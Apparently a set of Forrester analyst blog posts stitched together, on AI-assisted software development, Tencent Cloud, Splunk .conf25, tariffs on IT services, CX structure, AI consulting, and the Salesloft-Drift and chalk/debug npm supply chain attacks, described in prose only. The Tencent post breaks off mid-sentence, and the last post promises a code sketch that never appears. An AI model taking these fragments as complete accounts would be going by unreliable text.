
Don’t Fire Your Developers! What AI-Enhanced Software Development Means For Technology Executives

You’ve heard the stories. “More than a quarter of all new code at Google is generated by AI,” boasts Sundar Pichai. “Twenty or thirty percent of [Microsoft’s] code … is written by software,” Satya Nadella proclaims. At the same time, companies seem to be freezing hiring — or outright firing — their developers. All of this has led you to a severe case of AI SDLC FOMO. The reality? After analyzing Forrester’s survey data, reviewing hundreds of guidance sessions and inquiries, conducting 17 interviews, and building on the foundation laid by expert analysts such as Diego Lo Giudice, I did not hear a single technology leader say they were looking to fire their developers. Instead, what I found was equal parts interest and ignorance, promise and trepidation.

You Shouldn’t Oversimplify The SDLC

There is no doubt that willingness to leverage AI for software development is high. In Forrester’s Developer Survey, 2025, using AI and genAI is a top objective for developers (right alongside improving software security and using more open source). At the same time, tech leaders told me that they were challenged by their peers’ notion that the SDLC is a single process.

For one, adoption rates for AI-enhanced assistants and agents (what Forrester refers to as TuringBots) vary across stages of the SDLC, largely based on process and tool maturity. Coding is farther ahead in most organizations than, for example, analysis and planning.

Further, efficiency gains also vary by SDLC phase. Intesa Sanpaolo, a leading bank in Europe, saw a 40% efficiency gain in test design but 30% in development (including unit testing) and 15% in requirements gathering and analysis.

This story — different gains in different areas of the SDLC with different adoption rates (even across different applications at the same company) — was echoed by many others I talked to. The reality: There is no one-size-fits-all approach to applying AI to the SDLC, and we need to stop thinking of it as a single process that can be swallowed up by a single agent.

The ROI Conundrum — You Can’t Justify What You Don’t Measure Correctly

Many technology leaders that Forrester speaks to are well past the honeymoon stage when it comes to AI investments. Experiments went well (or faltered) — now is the time to scale. Yet we continue to get questions about software development that show a lack of maturity. “How many lines of code should be written per day?” is not a valid KPI, whether you’re measuring a real person or an AI agent. Instead, you need to focus on the metrics that matter: progress, such as velocity and rework trends; quality, such as production defects and deployment failures; efficiency, such as throughput and flow; and engagement, such as developer experience. All of these lead to business value. How do we onboard customers faster with new features? What is the impact on our Net Promoter Score℠ of a low-quality change? How do we improve revenue through more efficient integration with core systems?

These are baseline questions you need to answer before you implement AI tools. Too many people I spoke to are trying to do it after. If you have difficulty calculating these metrics, value stream management solutions can help do the job for you.
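To make these buckets concrete, here is a minimal, hypothetical sketch (the field names and formulas are illustrative assumptions, not a Forrester-prescribed standard) of how a team might compute a few of these metrics from its sprint and deployment records:

```typescript
// Illustrative only: record shape and formulas are assumptions, not a standard.
interface SprintRecord {
  storyPointsCompleted: number;
  storyPointsReworked: number; // points spent redoing earlier work
  deployments: number;
  failedDeployments: number;
  productionDefects: number;
}

// Progress: average velocity across the period (assumes a nonempty history).
function velocity(sprints: SprintRecord[]): number {
  const total = sprints.reduce((sum, s) => sum + s.storyPointsCompleted, 0);
  return total / sprints.length;
}

// Progress: share of completed effort that was rework.
function reworkRate(sprints: SprintRecord[]): number {
  const reworked = sprints.reduce((sum, s) => sum + s.storyPointsReworked, 0);
  const completed = sprints.reduce((sum, s) => sum + s.storyPointsCompleted, 0);
  return completed === 0 ? 0 : reworked / completed;
}

// Quality: deployment failure rate across the period.
function deploymentFailureRate(sprints: SprintRecord[]): number {
  const deploys = sprints.reduce((sum, s) => sum + s.deployments, 0);
  const failures = sprints.reduce((sum, s) => sum + s.failedDeployments, 0);
  return deploys === 0 ? 0 : failures / deploys;
}
```

Trend these before rolling out AI coding tools, then compare after; the before-and-after deltas, not lines of code per day, are what connect the investment to business value.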
Getting Past Trust Concerns

While there were concerns early on about AI tools in the SDLC accidentally leveraging a competitor’s code — or worse, that your IP would be consumed into someone else’s model — these are largely unfounded. We found that adoption rates in highly regulated verticals such as financial services and government are moving nearly as fast as at companies that dove into AI headfirst.

To speed things up further, some enterprises are leveraging past experience applying AI to other areas of their company to streamline adoption. They are also addressing IP theft with knowledge and technical solutions: Many of today’s solutions can be trained on your own codebase, and — if you are truly concerned — you can run some solutions on-premises. This can alleviate the concerns of your legal and risk management teams and avoid adoption deadlock.

Hold On To Your Developers, But You Must Reskill Them

Perhaps most tellingly, the people I spoke to saw a future for developers — but a different kind of “developer.” Architectural skills and business domain knowledge come to the forefront. (In other words: Vibe coding is cool, but vibe engineering is way cooler.) As AI improves, technical knowledge about writing code recedes in importance. Instead, multiagent workflows will force developers to become agent orchestrators: They will navigate agentic choruses far more than the individual songs they’re used to singing. We are already starting to see this in more mature organizations.

As for entry-level developers? I admit we see challenges here. Some I spoke to felt AI could provide ongoing training to new talent, but most disagreed. Instead, there was a consensus that tribal knowledge is still king and that the best way to share that knowledge is through the veteran developers on your team. Essentially, veteran conductors become veteran teachers.

Moving Toward The Agentic SDLC

I would argue we stand on the precipice of the biggest change to software development since the up-leveling from assembly to higher-level languages. Yes, even bigger than the advent of cloud-native development. Entire processes of analyzing, planning, designing, building, testing, and delivering software are being augmented.

But that’s the key word: augmented.

Until the day comes that we can fully trust AI agents to deliver critical, production-level software across a wide spectrum of business use cases, there will be a need for developers. Coders — who take requirements, write code, and pass their work on to the next phase of the SDLC — will die. Developers — who understand the business impact of their work and reshape the SDLC as they see fit — will thrive.

For a great deal more detail, please read my new report, “Don’t Fire Your Developers! What AI-Enhanced Software Development Means For Technology Executives.”


A Tale Of Two Engines: Meet The New Tencent

At the fifth Tencent Cloud International Summit, part of the company’s wider Global Digital Ecosystem Summit in Shenzhen, Tencent made its strategic direction clear: It is accelerating two engines to drive future growth. First, AI is positioned as the intelligent engine, enabling productivity and innovation across industries. Second, globalization serves as the expansion engine, bringing Tencent Cloud’s advanced capabilities to enterprises worldwide through localized, sovereign infrastructure; compliance; and strategic partnerships. These dual priorities signal Tencent’s ambition to evolve from a domestic cloud leader into a global AI-cloud platform provider that helps businesses innovate faster while meeting critical requirements for digital sovereignty and ecosystem integration.

AI: From Model Race To Usable Agentic And Physical AI

Chinese cloud leaders are pivoting from headline model benchmarks to production-grade, agent-driven AI that plugs directly into enterprise workflows and sovereignty-ready stacks. Tencent casts this pivot as an intelligent engine and opens its AI capabilities via Tencent Cloud so customers can turn AI from concept into measurable productivity. The company paired model advances with toolchains for development, deployment, observability, and governance. This signals a pragmatic phase focused on cost, reliability, and integration into SaaS and data estates rather than one-off demos. Major announcements on AI include:

- Agentic stack, end to end. Tencent introduced its Agent Development Platform (ADP) to accelerate real-world agent building with large language model and retrieval-augmented automation, workflow, and multiagent patterns. The new Agent Runtime provides five core capabilities (execution engine, cloud sandbox, gateway, context, and observability) with enterprise readiness. For example, its sandbox can start in about 100 milliseconds and scale to hundreds of thousands of concurrent agents. Cloudmate, an expert service agent, has reportedly intercepted 95% of risky SQL and cut troubleshooting from 30 hours to about 3 minutes in internal practice, directly addressing the reliability and operations-debt concerns that stall AI in production.
- Agentic AI at scale for usability. Tencent embedded agentic AI features into its collaboration and AIOps software. Its generative AI chatbot, Yuanbao, now connects with Tencent Meeting, Tencent Docs, and other apps. Tencent Meeting added real-time AI minutes, driving a 150% year-over-year increase in AI users. LeXiang Knowledge Base supports 102 content formats with reported 92% QA accuracy, and CodeBuddy fuses product-to-deployment workflows such that about 50% of new internal code at Tencent is AI-generated, with coding time falling by 40%. The throughline is “usable AI” that multiplies throughput in meetings, knowledge retrieval, legal review, and software delivery without forcing teams to switch tools.
- Foundation model upgrades for 3D. Transformer architecture is driving next-generation advances in computer vision, and Diffusion Transformer (DiT), a class of generative models that combines diffusion with transformer architecture, takes this evolution to the next level. The Hunyuan3D 3.0 foundation model adopts a hierarchical sculpting approach for 3D-DiT to improve modeling accuracy and geometric resolution, marking a significant advance in 3D modeling technology. Over the past year, Hunyuan released more than 30 models and embraced open source; downloads of the 3D series surpassed 2.6 million, pointing to strong developer uptake for digital twins, gaming assets, and immersive commerce.
- Tairos platform ecosystem for embodied intelligence. Tencent unveiled Tairos, its embodied intelligence platform, marking its entry into the physical AI domain. Tairos acts as the “AI brain” for humanoid robots and other embodied systems, offering robotics developers advanced perception, motion planning, and human-machine interaction capabilities. The platform integrates simulation environments, cloud-based control, and large-model reasoning to accelerate robotics development. By working with leading humanoid vendors — such as AgiBot, KEENON, and Unitree — Tencent’s robotic offering has the potential to enable industries such as manufacturing, logistics, and services to deploy intelligent, adaptive machines at scale.

Globalization: From Infrastructure Expansion To Sovereign Cloud

Chinese tech vendors have spent the past decade of geopolitical friction with the US building comprehensive solutions and practices for tech self-reliance; now, expanded geopolitical tensions are placing digital sovereignty at center stage for enterprises worldwide. The next phase of globalization among Chinese vendors is to apply these experiences overseas systematically: building regional infrastructure, aligning with local compliance, packaging operational playbooks, and serving through partner-led motions. Tencent’s globalization engine upgrades its offerings across infrastructure, products, and services. Overseas clients can adopt full-stack cloud and AI on local terms, with regional data handling and support to meet sector-specific needs. Major moves include:

- A two-pronged global expansion strategy. Abroad, the company operates a dual strategy: powering Chinese giants like NIO and Honor, as well as leading gaming firms, as they expand internationally, while simultaneously partnering with local companies such as Japan’s Vector to create region-specific solutions. In Japan, Tencent Cloud enabled Vector to develop AI-generated avatar campaigns crafted specifically for Japanese cultural preferences. This two-pronged approach positions Tencent as both a bridge for Chinese digital expansion and a catalyst for local innovation abroad. Success depends on mastering four critical factors: partnership depth, brand trust, culturally attuned execution, and sales velocity. Execute well on both fronts, and Tencent will become an essential platform for digital transformation, whether companies are going global or local.
- Footprint and edge acceleration. Tencent is setting aside US$150 million for its first Middle Eastern data center in Saudi Arabia and a third Japanese facility in Osaka (plus a new office) while maintaining nine global technical support centers across APAC, Europe, and the US. At the edge, EdgeOne Pages ties large models to MCP Servers so developers can stand up a complete localized e-commerce presence, including registration, payments, acceleration, and security, all in minutes. Tencent says the service surpassed 100,000 users in three months, signaling demand for AI-accelerated, locality-aware web operations.
- International product line upgrades. Tencent Cloud delivered globalized editions of ADP, CodeBuddy, Cloud Mall (omnichannel commerce), Starry Sea servers, TDSQL databases, Tencent Cloud Enterprise (TCE), and the EdgeOne accelerated security platform. The stated goal is compatibility with mainstream global stacks and developer tooling, lowering integration effort and compliance friction for customers that run heterogeneous environments. For builders, these releases mean faster agent development, secure deployment at the edge, and smoother data residency controls. It will turn Tencent’s domestic


Splunk .conf25: Cisco, AI, And Data

The 10th annual Splunk .conf took place in Boston, Massachusetts, this year, a refreshing change from the heat and slot machines of Las Vegas. The change in venue didn’t seem to hurt the event’s turnout: Splunk’s Boss of the SOC (BOTS), its capture-the-flag competition, drew even more attendees than the previous year, by a large margin. There were many comments this year that, between BOTS and some of the announcements, this was a return to the Splunk of old — a big compliment, given how many people have been holding their breath for three years now over Cisco’s acquisition of Splunk.

The opening keynote, delivered by Cisco Chief Product Officer Jeetu Patel, emphasized the importance of AI and machine data in the future of Splunk, referring to data as the essential fuel for AI. Machine data at “ludicrous scale” was a consistent theme throughout the conference. Some of Splunk’s key announcements included the Cisco Data Fabric and its Machine Data Lake. The Cisco Data Fabric is its new way of describing the data journey, from traditional Splunk ingest to federated search (such as on Snowflake, which it also announced) and analytics to its new Machine Data Lake. The Machine Data Lake is a cost-effective way to store data within Splunk, allowing data to be promoted to Splunk for easier and faster search and analytics. Importantly, the Machine Data Lake sits below both Splunk ES and Observability, so data is effectively shared and can be promoted to either instance as needed.

Cisco also announced AI Canvas, which provides a more widgetlike experience for interacting with the AI assistant. This is an interesting approach to better visualizing the AI assistant’s outputs, which can help teams operationalize and interact with the data more effectively. It uses deterministic and nondeterministic methods to present relevant content in the most appropriate widget and then highlights linked elements in other existing widgets on the canvas.

Enterprise Security 8.2 Is Live — The Rest Is Alpha

Generally available capabilities were few and far between beyond ES 8.2, but there were a few especially interesting up-and-coming security announcements:

- A new approach to packaging: Enterprise Security Essentials, which includes SIEM and the AI assistant, and Enterprise Security Premier, which includes SIEM, the AI assistant, SOAR, UBA, and threat intel management. As of the conference, this is in controlled availability.
- Detection Studio, based on the SnapAttack acquisition, which will give detection engineers better visibility into and understanding of their detections, including version control. It will be available in January 2026.
- An AI agent for script analysis, the Malware Reversal Agent, which is available now. An AI agent for triage (alpha in January 2026), AI SOAR playbook authoring (alpha in November 2025), and the ability to customize the AI capabilities to SOPs are coming.
- Five GB per day of free ingestion of Cisco firewall logs into Splunk, which is valuable and could motivate some to switch more firewall capabilities over to Cisco. Five GB per day in an enterprise setting doesn’t go very far, however, especially with firewall data.

Observability Was All The Rage, But Context Is Still King

Splunk has not lost its focus on delivering observability capabilities and is expanding them into additional areas. The vendor seeks to evolve observability by extending its reach to data, AI agents, and infrastructure to drive what it calls agentic observability.
The objective is to deliver unified observability that enables enterprises to demonstrate business impact and improve their ability to fix and prevent issues with AI agents. APM support for hybrid applications and business transactions in observability cloud is a key component. Keynote announcements such as those about the Data Fabric, the Snowflake integration, the Machine Data Lake, and the Time Series Foundational Model demonstrated that Splunk recognizes how important improving digital resilience and compressing investigation and detection times are to enterprises. The timeline on some of these releases, however, stretches well into the future. Some features are scheduled for an alpha release in February 2026, which will not sit well with some clients, as competing platforms already deliver these offerings.

The importance of context across the enterprise was a consistent message from senior Splunk leadership. In reference to the Snowflake integration and supporting open formats, Kamal Hathi, SVP and GM of Splunk, stated that “it gives great business context for many of the operational use cases.” AIOps and observability, which are increasingly dependent on agentic AI, can only achieve their objectives if they have full contextual awareness. Splunk appears to be in tune with this and is working to make these capabilities generally available starting in October, with some only targeted for alpha releases in February 2026.

Splunk Pushes Forward With Its Data Platform Enhancements

Overall, .conf demonstrated that Cisco is heavily focused on leveraging Splunk to support the Data Fabric and its AI message while still backing Splunk’s open-ecosystem message and large, engaged community. Now, with the acquisition fully behind it, Splunk has the opportunity to turn up the pressure on competitors with the full backing of Cisco’s resources and experience.

Forrester clients can schedule an inquiry or guidance session to break down the security and observability announcements. There is also an upcoming opportunity to connect with Forrester analysts (and your peers) in person: the Forrester Technology & Innovation Summit from November 2–5 or the Security & Risk Summit from November 5–7. Both events are packed with visionary keynotes, informative breakout sessions, interactive workshops, insightful roundtables, and other special programs to help you master risk and conquer chaos. Join us in Austin, Texas — we can’t wait to see you there!


US Tariffs And IT Services: Prepare Your Organization For A Range Of Outcomes

When was the last time you saw someone on a unicycle trying to juggle a few bottles? Have you ever tried it? Sure looks impossible, right? This is a familiar sight for technology leaders, because that is the nature of their everyday existence. Deploying new capabilities? Managing cyber threats? Project running over budget? Just lost one of your highest performers to another company? Just another day that ends in “y.” Now, thanks to the possibility of US tariffs on outsourced IT services, IT leaders have a whole new concern. And it’s a big one. Before you proceed, please check out my colleague Linda Ivy-Rosser’s blog on the HIRE Act, which has been introduced in the US Senate. If you have limited time, she is much smarter than me anyway, so I’d start there.

IT service providers are a critical part of most CIO teams, used for many purposes: production support, staff augmentation for projects, strategic implementation partnership for major software implementations, business analysis, and more. The list goes on, to the tune of many millions of dollars. What are US IT leaders supposed to do now in case tariffs happen, whether by an act of Congress or an executive order?

Use Scenario Planning To Minimize Your Impact

While you cannot be 100% prepared for all possible outcomes, it is helpful to be ready for a range of uncertainty. Forrester frames this approach through three different scenarios: baseline, pessimistic, and optimistic. In all scenarios, preservation of your most strategic investments is paramount and should be secured quickly. Let’s examine each in this context (a rough budget sketch follows at the end of this post):

- Baseline: Tariffs are introduced at a baseline amount of 10%, consistent with the baseline tariffs on products implemented earlier this year. In this scenario, cost increases are modest across the board but likely still require some adjustments. Partner closely with your procurement team to evaluate where your highest impacts are and the net effect on your overall budget.
- Pessimistic: Tariffs are steep and wide, raising costs at a level that will cripple most current-year financials. Additionally, future-year planning will mean a meaningful reduction in the money available for strategic investments. In this worst-case scenario, keeping the lights on will dominate the budget, and your AI, tech debt remediation, and new feature development will slow dramatically. Leaders will need to quickly evaluate exit strategies from service providers, weighing not only the financial impact of doing so but also the workload impact on employees who have to pick up new work.
- Optimistic: After an initial tariff implementation, negotiations with the US administration proceed quickly toward another outcome that causes an extended pause in the tariffs, similar to what happened with Mexico and Canada earlier this year. In this scenario, it is not guaranteed that the tariffs will stay paused; however, IT leaders have more time to adequately prepare for the impact and make the necessary staffing or budget adjustments to mitigate it.

Engage Your Stakeholders Now For Maximum Alignment

Regardless of which scenario plays out, your first immediate step needs to be agreement with your stakeholders on how the company will collectively respond. IT leaders cannot manage these impacts alone, nor should they try. Here is a set of concrete actions to gain alignment on before the tariffs hit:

- Agree on your most important investments and protect them. If you are this close to deploying a game-changing agentic solution, make sure it continues.
- Ruthlessly prioritize everything else. Utilize a value-based approach to prioritizing the rest of your investment list, draw a “cut” line for each scenario listed above, and gain agreement with your stakeholders on the execution plan so you are ready to go when the time is right.
- Tap into pre-allocated vendor funding. Consulting delivery firms can serve as the conduit for firms to tap into several funding mechanisms offered by the major cloud hyperscalers (AWS, Microsoft Azure, Google Cloud), as well as the hardware platform providers, to accelerate customer adoption and reduce the cost of delivery. Migration and modernization funds are also common, providing rebates or credits to offset the cost of moving workloads to the cloud or replatforming legacy applications. In addition, firms can leverage marketing development funds (MDF) that consulting partners can use for joint go-to-market campaigns, events, or solution accelerators. Finally, there are training and enablement grants that help upskill delivery teams and customers on cloud-native technologies. Combined, these funding mechanisms allow consulting firms to de-risk projects for customers, increase win rates, and build repeatable, scalable offerings.
- Prepare a communication plan for your organization. Any of these scenarios will result in changes for the organization. This will bring about uncertainty among the staff, as inevitably some projects may be delayed or cancelled, causing employees to worry about their jobs. Use Forrester’s change management research to help your staff navigate these impacts.

The implementation of these potential tariffs could be one of the biggest changes to hit your organization in recent memory. Are you ready? If not, schedule time with one of our analysts to help you get ready. If you think you are ready, still schedule time with us to review your plans. We may find something you missed and/or provide a second set of eyes for reassurance that you’ve thought of everything.
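As promised above, here is a rough, back-of-the-envelope sketch of the scenario math. All figures, including the 25% pessimistic rate, are hypothetical placeholders to be replaced with your own budget data:

```typescript
// Hypothetical figures for illustration only; substitute your own numbers.
interface Scenario {
  name: string;
  tariffRate: number; // rate applied to outsourced IT services spend
}

const outsourcedSpend = 20_000_000; // annual services spend subject to tariffs
const totalItBudget = 50_000_000;   // total annual IT budget
const keepTheLightsOn = 35_000_000; // non-discretionary run costs

const scenarios: Scenario[] = [
  { name: "Baseline (10%)", tariffRate: 0.10 },
  { name: "Pessimistic (25%, assumed)", tariffRate: 0.25 },
  { name: "Optimistic (paused)", tariffRate: 0.0 },
];

for (const s of scenarios) {
  const tariffCost = outsourcedSpend * s.tariffRate;
  const strategicBudget = totalItBudget - keepTheLightsOn - tariffCost;
  console.log(
    `${s.name}: tariff cost $${(tariffCost / 1e6).toFixed(1)}M, ` +
      `strategic budget left $${(strategicBudget / 1e6).toFixed(1)}M`
  );
}
```

Running this prints the tariff cost and the strategic budget remaining under each scenario, which makes the “cut line” conversation with stakeholders concrete.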


It’s Time To Talk About Where Your CX Function Should Sit

For years, I’ve gotten the same question fairly regularly: “Where should my CX function sit?” And for years, I’ve given the same answer: “It depends.” Between my own experience leading a CX function and working with literally hundreds of CX leaders around the world, I have yet to encounter one cookie-cutter template that makes sense as the place to put a CX function. Now, roughly two years after kicking off a project to answer this question more definitively, I’m happy to say that our report, Where Your CX Function Should Sit, has confirmed that the right answer really is: “It depends.”

That raises the question: “What does it depend on?” But answering that requires even more nuance than answering the first question. We identified multiple factors and variables that influence the best possible home for the CX function. For example:

- The express train to the C-suite may derail the CX function. Reporting directly to the CEO sounds great in theory, particularly when the CEO understands that improving CX leads to better business results (regardless of whether the organization is in the private sector or the public sector). But if the CEO doesn’t have bandwidth for another direct report or isn’t on board with CX, then the increased visibility without sufficient executive support will lead to failure.
- The CX leader is a big part of the equation. Since not every CX function can (or should) be at the top of the org chart, the CX leader’s ability to build advocates and allies is a critical success factor. While this may seem like “soft” power, having friends willing to provide information, funding, or project staffing can lead to very real outcomes.
- The CX function may not stay in the same place forever. Businesses are dynamic: Strategies change, executives leave and get replaced, and org charts get shuffled. So while it may make sense for the CX function to report to Executive A today, some change may make it more logical for it to report to Executive B tomorrow.

We reviewed data from multiple global surveys and interviewed dozens of CX leaders and strategy consultancies to identify the key variables that lead to high-performing, successful CX functions. Using that as a base, we developed a workshop-in-a-box to enable Forrester clients’ own voyages of discovery. This decision-support tool asks the client to consider the organization’s level of customer obsession, what matters most to the organization’s customers, and the traits of leaders best positioned to align CX with what matters the most. This is not a calculator that will spit out a single, perfect answer after checking a few boxes. Its output is a prioritized list of potential executive sponsors who can be approached to gauge their interest in providing a home for the CX function. Because things can change, this workshop-in-a-box is designed for leaders looking to establish a new or rebooted CX function, as well as those aiming to validate an existing CX function’s home.

Where do you go from here? If you’re a Forrester client, start by reading the report. Then either reach out for a guidance session to discuss your specific questions or jump straight to the workshop-in-a-box. We can also do the workshop side by side with clients through a strategy session (for VIP seat holders only), an initiative workshop, or Forrester Consulting. If you’re not yet a client, please reach out to our sales team! This was a highly collaborative research project that involved analysts and researchers from across many of Forrester’s research teams.
I’d like to thank the following for their contributions: Alex Schanne, Dipanjan Chatterjee, Su Doyle, Shar VanBoskirk, Katy Tynan, Dave Frankland, David Johnson, Colleen Fazio, Fiona Mark, Christina McAllister, Shari Srebnick, and Camille Floyd.


The Agentic Business Fabric Is How AI Will Transform Enterprise Applications

The discussion around the agentic future of enterprise software is stuck on the promise of tech adoption. We’re debating the ideas — which large language models to use, how to build agents, and the merits of various data fabric architectures — as if, once embraced, you’re on the way to success. While important, these conversations miss the point and distract from how these elements will fundamentally change the way business operates. We see organizations making massive tech investments that will ultimately fail to deliver value. Why? Because they’re treating this as a silver-bullet solution. It isn’t. The transition to an agentic business fabric future is fundamentally a reinvention of your operating model. Using AI enterprise platforms for internal operations to do what you already do, faster, is good. Using AI to do things you haven’t done before is better. Success hinges on organizational and commercial shifts in business strategy.

What’s The Agentic Business Fabric?

The agentic business fabric is an intelligent ecosystem where AI agents, your data, and your employees work together to achieve business outcomes. Instead of users navigating a dozen applications, the fabric orchestrates the necessary capabilities behind the scenes. The goal is to manage the integration of business workflows and make technology invisible, allowing your teams to focus on strategic work, not complex software. (A simplified sketch of this orchestration pattern appears at the end of this post.)

Stop Focusing On “What Agents Do” — Focus On “How They Decide”

Most leaders think about how AI will change existing workflows; high-performing enterprises are already redesigning job descriptions. As agents absorb routine tasks, the value of human employees shifts from “doing the work” to supervising the system. Your future MVPs will be AI supervisors and process optimizers. These roles require deep domain expertise and data literacy. Are you actively defining these roles with HR? Are you building training programs to upskill your best people? If you wait, your workforce will be unprepared for the new operational reality.

Your Commercial Models Are Now Obsolete

Finally, recognize the new vendor power play. Vendors are using AI urgency to end discounts and reset commercial terms. They sell premium-priced tools, but according to our research, the value is unlocked by your investment in process redesign, not the software. This means the burden of success and most of the cost fall on you. Organizations that fail to build architectural flexibility and financial discipline will find themselves locked into expensive platforms that deliver only theoretical benefits.

Strategic Control Is The Real Challenge

This AI era centers on whether you’ll maintain strategic control over your digital destiny or surrender it. Leveraging the agentic business fabric requires a coalition of technology, business, finance, and HR leaders. Investing in the functional capabilities is the easy part; transforming how your business operates and captures new forms of value is the real challenge.

FAQs

Q: What’s the main barrier to successful AI functional implementations?
A: The primary barrier isn’t technology but the lack of a clear operating model. Success requires redesigning jobs, achieving semantic alignment on business data, and creating new commercial models before deploying AI tools.

Q: How does an agentic fabric differ from traditional enterprise software?
A: Traditional software requires humans to navigate multiple applications to complete a process. An agentic fabric orchestrates the work behind the scenes, allowing users to focus on outcomes and exceptions rather than manual data entry and process management.

Next Steps

To dive deeper into the architectural and strategic shifts required, read our new report, The Agentic Business Fabric: AI’s Architectural Transformation Of Business Applications. To pressure-test your own strategy, schedule a guidance session with us to discuss your operating model for the agentic era.
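To make the orchestration idea concrete, here is a deliberately simplified TypeScript sketch. Every interface and name is invented for illustration; this is a conceptual model, not any vendor’s API:

```typescript
// Conceptual sketch only: all interfaces and names are invented for illustration.
interface AgentResult {
  ok: boolean;
  output: string;
}

interface Agent {
  name: string;
  handle(task: string): Promise<AgentResult>;
}

// The "fabric": routes one business request through specialized agents and
// escalates exceptions to a human supervisor instead of failing silently.
class BusinessFabric {
  constructor(
    private agents: Agent[],
    private escalateToHuman: (task: string, reason: string) => void
  ) {}

  async run(task: string): Promise<string> {
    let context = task;
    for (const agent of this.agents) {
      const result = await agent.handle(context);
      if (!result.ok) {
        // Humans supervise the system rather than do the routine work.
        this.escalateToHuman(task, `${agent.name} could not complete its step`);
        return "escalated to human supervisor";
      }
      context = result.output; // each agent enriches the shared context
    }
    return context; // the user sees an outcome, not the apps behind it
  }
}
```

A real fabric adds semantic data alignment, governance, and auditing around this loop, but the design point stands: users ask for an outcome, and the fabric, not the user, navigates the underlying applications.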


The Future Of AI Consulting Services Is Disruptively Bright

Despite what you may have read in the media, consulting is not being entirely consumed by artificial intelligence. Yes, the economic paradox of professional services in the AI computing era is that business and technology consultants can use AI-powered delivery platforms to do more work at lower cost. That puts pressure on service provider margins, reduces the need for more headcount, and forces a reconciliation between what enterprise buyers need and what service providers have historically offered. Meanwhile, CIOs are drowning in AI consulting pitches, from management consulting and Big Four accounting providers promising transformation magic to boutique players claiming AI-native superiority. The noise is deafening, and the stakes couldn’t be higher, as every company must reinvent its processes and business model in the AI computing era.

As I take on responsibility for the Forrester Wave™ covering AI consulting services in 2026, and as part of a services analysis team with decades of experience with management consultancies and technology service providers, it’s a good time to state some positions. Providers will have to:

- Reprice services, because they can do more work at lower cost. This is the short-term effect. Service providers have been through this before, in the transitions to offshore labor arbitrage and cloud computing. They will do it again: automating more work, establishing deeper co-innovation with alliance partners, and building more assets to improve services and outcomes. They will alter their staffing structures, invest more in platforms, and change their pricing and risk models, including more value-based and shared-risk commercial models. They will also charge explicitly for, or bundle in, the cost of their assets as part of the new commercial value proposition.
- Invest more in alliance relationships and co-innovation capabilities. AI consulting service providers have expanded their relationships with hyperscalers, software giants, data platform builders, hardware OEMs, and now NVIDIA. This allows them to get early access to technology, build new solution architectures, (presumably) learn how the technology works before taking it to clients, and take advantage of tech providers’ subsidized delivery dollars. Together with the AI technical service providers, the AI consulting service providers have joined an expanded AI computing ecosystem as solution orchestrators.
- Build practices to address an expanding array of AI scenarios. We are in the early years of a 15-year transition to AI-powered business, and the scenarios for AI-powered business continue to expand. Most scenarios today have focused on internal operating models and technology readiness. The scenarios of tomorrow will focus on customer engagement and on products and services that generate revenue. Firms will turn to consulting services for help designing and migrating to AI + human business processes, establishing AI-native business and customer engagement models, and building new roles in AI-powered value chains.
- Rethink their hiring, development, and organizational models. The death of the pyramid has been pundit fodder for a decade. New structures are proposed every day: diamond-shaped as AI takes over entry-level work, podlike as AI + human delivery shares the load between people and AI machinery, and so on. New entrants into AI business consulting are bringing AI-first value propositions to consulting services and will put pressure on the major consultancies to revamp their approaches. Consultancies still need a talent pipeline to develop the next generation of expertise and establish deeper client relationships, but they also need an expanded portfolio of baseline skills to develop new industry, technical, and client knowledge; build platforms for delivery and operations; and invest in next-generation AI computing architectures.
- Modify their economic models to share more risk. Consultancies have gotten a free ride on risk, using the motivation of expertise and customer satisfaction as their guideposts for success. Nobody blacklisted a consultancy for giving them bad advice — they just didn’t hire them again. We see this changing. Management consultancies have already moved toward putting their fees at risk (using outcome-based pricing, for example). We see this expanding as enterprises negotiate with their AI consulting service providers to put some skin in the game — and be compensated for taking on that risk.
- Put their proprietary knowledge and expertise to work. What do AI consulting service providers bring if not proprietary knowledge and expertise? One of the lessons the major consulting providers have already learned is that their proprietary industry, domain, data, knowledge, and code libraries are valuable assets that turn generic foundation models into decent agentic applications. They will invest much more in proprietary knowledge and build offerings and services around it.

All this speaks to a healthy, if different, AI consulting services ecosystem ahead. If you are a Forrester client seeking counsel on AI consulting services, please reach out. If you are an AI consulting service provider, I’m happy to learn more about your practices, your assets, your customers, and your commercial approach to helping clients.


School Is In Session, And Attackers Are Grading Your Software Supply Chain Security

Software supply chain attacks continue to be a top external attack vector for breaching enterprises, government agencies, and even personal cryptocurrency wallets. Three recently revealed attacks are a reminder of how attackers probe for any weakness in a supply chain, including smaller entities, to target larger enterprises. Learn from these attacks to strengthen your supply chains or expose yourself to the same.

Salesloft-Salesforce

The Salesloft-Salesforce breach is the most sophisticated of the three and has had the biggest impact. In this attack, threat actors compromised Salesloft’s Drift customers and Salesforce customer accounts. Over 700 companies have been affected.

The software supply chain weakness. The breach originated with attackers accessing the Salesloft GitHub account and code repositories. Attackers then accessed the Drift AWS environment. From AWS, attackers obtained authorization tokens for Drift customers’ technology integrations, including Salesforce, which were in turn used to exfiltrate data from Salesforce customer environments. Separately, attackers utilized other Drift integrations to compromise other enterprises. Forrester’s more comprehensive breakdown is here.

What the attackers did. The attackers accessed sensitive data from numerous accounts, including well-respected cybersecurity vendors such as CyberArk, Proofpoint, Tenable, and Zscaler. The exposed customer data included IP addresses, account information, access tokens, customer contact data, and business records such as sales pipeline. The attackers exploited cleartext storage of sensitive information within Salesforce support case notes, which were intended to facilitate customer support but provided critical data for the hackers.

The impact. The attack showed that attackers can pivot from one application (Drift) into other integrations such as Salesforce, accessing customer environments and making this a third- and fourth-tier supply chain attack.

Chalk And Debug

“chalk and debug” was named after two of the 18 open-source Node Package Manager (NPM) packages that were compromised on September 8.

The supply chain weakness. The attackers started with a targeted phishing campaign against maintainers of popular open-source NPM packages to steal credentials. The attackers used the stolen credentials to lock developers out of their NPM accounts and publish new versions of the popular packages with malicious code embedded. Josh Junon (NPM account name “qix”), one of the compromised maintainers, posted to social messaging sites that he had been hacked and had reached out to NPM maintainers for help rectifying the issue. The malware itself was a browser-based interceptor that captures and alters network traffic and browser app functions by injecting itself into key processes, such as data-fetching functions and wallet interfaces, to manipulate requests and responses. (A simplified sketch of this hooking pattern appears at the end of this post.) The attackers did a good job of disguising the payment details, redirecting funds to an attacker-controlled destination. To the user, the crypto transaction appears to complete successfully, until the user realizes that the crypto did not reach the intended location.

